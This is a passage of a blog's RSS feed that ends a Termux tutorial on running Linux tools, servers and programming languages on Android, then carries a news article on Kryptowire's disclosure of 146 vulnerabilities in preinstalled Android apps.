<p>Need something to take notes and provide to-dos? Org-mode in Emacs has you covered. You can even use Emacs as your <a href="https://github.com/escherdragon/sunrise-commander" target="_blank" rel="noopener noreferrer">file manager</a>, <a href="https://github.com/rnkn/fountain-mode/" target="_blank" rel="noopener noreferrer">screenwriting app</a>, <a href="https://github.com/org-trello/org-trello" target="_blank" rel="noopener noreferrer">Trello client</a>, <a href="https://www.gnu.org/software/emms/" target="_blank" rel="noopener noreferrer">music player</a>, or to play <a href="https://bitbucket.org/zck/minesweeper.el" target="_blank" rel="noopener noreferrer">Minesweeper</a>.</p>
<p><strong>Why switch?</strong> Android text editors tend to focus on one standout feature. For example, one may focus on distraction-free drafting, another can preview Markdown and other formatting, and still others might be built on keeping notes (though they’re really just text editors at their core).</p>
<p>Terminal-based editors can fulfill these needs in a single program, while also being available on desktop platforms.</p>
<h3>Termux Command Line Utilities</h3>
<p>Termux packages include several useful Linux command line utilities:</p>
<ul>
<li><strong>gnuplot:</strong> A mathematical graphing program</li>
<li><strong>ImageMagick:</strong> An image manipulation and conversion toolkit</li>
<li><strong>p7zip:</strong> An archiving utility for the 7-Zip compression scheme</li>
<li><strong>UnRAR:</strong> A different archive tool for the RAR format</li>
<li><strong>Wget:</strong> A program to fetch files over the internet via HTTP or FTP</li>
</ul>
<p><strong>Why switch?</strong> These are dedicated programs with a lot to offer.</p>
<h3>Install Servers in Termux</h3>
<p class="linked-out">We’ve already shown how you can <a href="https://www.makeuseof.com/tag/turn-android-device-web-server/">turn your Android device into a web server</a> with specific apps. Termux similarly provides genuine Linux web servers like Apache, nginx, and Lighttpd.</p>
<p><span class="link-callout visible"> <span class="link-callout-image"> <span class="link-callout-image-container lazy-load" data-background-image="//static.makeuseof.com/wp-content/uploads/2015/08/android-web-server-297x141.jpg" data-loaded="true"> <a href="https://www.makeuseof.com/tag/turn-android-device-web-server/">How to Turn an Android Device Into a Web Server</a> </span> </span> <span class="link-callout-info"> <span class="link-callout-title"> <a href="https://www.makeuseof.com/tag/turn-android-device-web-server/">How to Turn an Android Device Into a Web Server</a></span> <span class="link-callout-excerpt">Want to host a simple website without an expensive hosting plan? Here&#8217;s how to host a website on your Android phone or tablet.</span> <a class="link-callout-link" href="https://www.makeuseof.com/tag/turn-android-device-web-server/">Read More</a> </span> </span></p>
<p>But why would you want to run a web server on your Android device?</p>
<p>In addition to programming, bear in mind that many of today’s best applications are web apps. For example, you could install nginx, the PostgreSQL database, and Python, then use the <a href="https://taiga.io/" target="_blank" rel="noopener noreferrer">Taiga</a> project management platform. This is a lot of utility, all without having to sign up for any third-party services or hosting.</p>
<p>Termux also includes <strong>Dropbear</strong>, which provides an SSH server (and client) to log into your phone/tablet and transfer files. This is useful in situations where you want to exchange a few files but don’t want to use cloud services. Simply start up the Dropbear server, use an SSH client to grab what you need, and shut it down.</p>
<p><strong>Why switch?</strong> Apps like Tiny Web Server allow you to spin up a web server. But what’s more intriguing than having a lightweight server you can start from the command line?</p>
<h3>Development Apps in the Termux Command Line</h3>
<p>While many Android apps (listed as “code editors”) provide the ability to write code, they may not provide the languages themselves. With Termux, you can test your code on your phone or tablet.</p>
<p><img loading="lazy" decoding="async" class="aligncenter lazy-load" src="https://static.makeuseof.com/wp-content/uploads/2019/11/muo-android-termux-install-python.jpg" alt="Install Python development tools in the Termux command line" data-src="//static.makeuseof.com/wp-content/uploads/2019/11/muo-android-termux-install-python.jpg" data-loaded="true" width="670" height="408"></p>
<p>It offers standard distributions of programming languages such as:</p>
<ul>
<li>BASH shell (the default available out of the box, and a great way to get started hacking around)</li>
<li>Python (both v2 and v3 are available)</li>
<li>PHP</li>
<li>Ruby</li>
</ul>
<p>Source control systems git and Subversion are also available, which have their uses beyond just development. If you like being in control of your own data, source control lets you stash your files wherever you want. You also control when you send updates to other devices, and can use “tags” to label versions.</p>
<p><strong>Why switch?</strong> There are some programming language packages for Android, such <a href="https://play.google.com/store/apps/details?id=org.qpython.qpy" target="_blank" rel="noopener noreferrer">QPython</a>. But these provide their own bulky UIs. They may also require additional apps to be fully useful.</p>
<p>Android-based apps are available for both git and svn. However, you need to have a separate app for each source control type. Termux provides both in the same package for free. By going with source control, you can also cut down on clients for cloud syncing services such as Dropbox.</p>
<h2>Add Linux to Android With Termux Commands</h2>
<p>Termux is a super-compact offering that opens a lot of functionality for your Android device. The command line is one of the most powerful features of Linux, and Termux builds on your device’s Linux kernel to make you more efficient on the go.</p>
<p class="linked-out">And who knows, maybe dabbling with these apps will convince you to try Linux on the desktop as well.</p>
<p>The post <a href="http://kostacipo.stream/how-to-use-the-linux-command-line-on-android-with-termux/">How to Use the Linux Command Line on Android With Termux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-use-the-linux-command-line-on-android-with-termux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>146 New Vulnerabilities All Come Preinstalled on Android Phones</title>
		<link>http://kostacipo.stream/are-you-picking-the-right-clothes-when-going-out/</link>
					<comments>http://kostacipo.stream/are-you-picking-the-right-clothes-when-going-out/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sat, 23 Feb 2019 03:23:38 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[vulnerabilities]]></category>
		<guid isPermaLink="false">https://demo.mekshq.com/johannes/dc/?p=157</guid>

					<description><![CDATA[<p>&#160; The dozens of flaws across 29 Android smartphone makers show just how insecure the devices can be, even brand-new. When you buy an Android smartphone, it’s rarely pure Android. Manufacturers squeeze in their own apps or give it a fresh coat of interface. Carriers do it too. The resulting stew of preinstalled software and [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/are-you-picking-the-right-clothes-when-going-out/">146 New Vulnerabilities All Come Preinstalled on Android Phones</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>

<p>The dozens of flaws across 29 Android smartphone makers show just how insecure the devices can be, even brand-new.<br /><br />When you buy an Android smartphone, it’s rarely pure Android. Manufacturers squeeze in their own apps or give it a fresh coat of interface. Carriers do it too. The resulting stew of preinstalled software and vanilla Android sometimes turns out to be rancid, putting flaws and vulnerabilities on the phone before you even take it out of the box. For proof of how bad it is, look no further than the 146 vulnerabilities—across 29 Android smartphone makers—that have just been simultaneously revealed.</p>
<div class="grid grid-margins grid-items-2 grid-layout--adrail narrow">
<div class="grid--item body body__container article__body grid-layout__content">
<p>Yes, that’s 146, all discovered by security firm Kryptowire and detailed one by one in a new gargantuan disclosure. Most of the implicated companies operate primarily in Asia, but the list includes global heavyweights like Samsung and Asus as well. While the bugs vary in severity and scope—and in some cases, the manufacturers dispute that they’re a threat at all—they illustrate an endemic problem for Android, one that Google <a class="external-link" href="https://i.blackhat.com/USA-19/Thursday/us-19-Stone-Securing-The-System-A-Deep-Dive-Into-Reversing-Android-Preinstalled-Apps.pdf" target="_blank" rel="nofollow noopener noreferrer" data-event-click="{&quot;element&quot;:&quot;ExternalLink&quot;,&quot;outgoingURL&quot;:&quot;https://i.blackhat.com/USA-19/Thursday/us-19-Stone-Securing-The-System-A-Deep-Dive-Into-Reversing-Android-Preinstalled-Apps.pdf&quot;}">has acknowledged</a>.</p>
<p>The vulnerabilities Kryptowire turned up, in research funded by the Department of Homeland Security, encompass everything from unauthorized audio recording to command execution to the ability to modify system properties and wireless settings. What makes them so pernicious, though, is how they get on phones, and how hard they are to remove.</p>
<div class="consumer-marketing-unit consumer-marketing-unit--article-mid-content">
<div class="consumer-marketing-unit__slot consumer-marketing-unit__slot--article-mid-content consumer-marketing-unit__slot--in-content"> </div>
</div>
<p>“We wanted to understand how easy it is for someone to be able to penetrate the device without the user downloading an application,” says Kryptowire CEO Angelos Stavrou. “If the problem lies within the device, that means the user has no options. Because the code is deeply buried in the system, in most cases the user cannot do anything to remove the offending functionality.”</p>
<p>It’s one thing if you fall for <a href="https://www.wired.com/story/imposter-fortnite-android-apps-already-spreading-malware/">a shady <em>Fortnite</em> download</a>. At least that was a choice you made, and you can also uninstall it. The vulnerabilities Kryptowire found are often preinstalled at a system level, with no way to purge them from your device.</p>
<aside class="pullquote-embed" role="presentation" aria-hidden="true">
<p>&#8220;In the race to create cheap devices, I believe that the quality of software is being eroded in a way that exposes the end user.&#8221;</p>
<p>Angelos Stavrou, Kryptowire</p>
</aside>
<p>If all of this sounds vaguely familiar, it’s because Kryptowire has been down this road before. A little over a year ago <a href="https://www.wired.com/story/android-smartphones-vulnerable-out-of-the-box/">it disclosed the results</a> of a similar round of research that found this same class of defects built into 10 popular Android devices. The difference now—and the reason the work is so much more comprehensive—is that the team has built a tool that scans firmware for issues even if they don’t have the device physically in hand. Kryptowire’s system then automatically creates a proof of concept, in a matter of minutes, that validates the vulnerability’s existence and cuts down on false positives. The tool looks for “unsafe states,” as Stavrou puts it, that would allow an application to take a screenshot or record audio or create a network connection when it shouldn’t.</p>
<p>The issue often comes down to trust. Many of the vulnerabilities Kryptowire found enable apps to do things like change settings without your knowledge or consent.</p>
<p>“We believe that if you are a vendor you should not trust anybody else to have the same level of permissions as you within the system,” says Stavrou. “This should not be an automatic thing.”</p>
<p>“We appreciate the work of the research community who collaborate with us to responsibly fix and disclose issues such as these,” Google said in a statement. Google has its own vetting process, called the Build Test Suite, that checks software for potentially harmful preinstalled apps. BTS launched in 2018, and in its first year prevented 242 of those problematic installs from reaching consumers.</p>
<p>The Kryptowire research suggests that BTS has room for improvement. In fairness, it’s a problem of enormous scope. According to a presentation on this very topic given this summer by Google security researcher Maddie Stone, every Android device ships with 100 to 400 preinstalled apps. Many of those apps originate not from the company that’s making the physical device, but from third parties that provide the code for various under-the-hood tasks, or from carriers who have a vested interest in everything from messaging to payments. Most manufacturers are ill-equipped to parse all of those apps for potential risks, and even the largest still allow some sort of carrier influence</p>
</div>
</div><p>The post <a href="http://kostacipo.stream/are-you-picking-the-right-clothes-when-going-out/">146 New Vulnerabilities All Come Preinstalled on Android Phones</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/are-you-picking-the-right-clothes-when-going-out/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
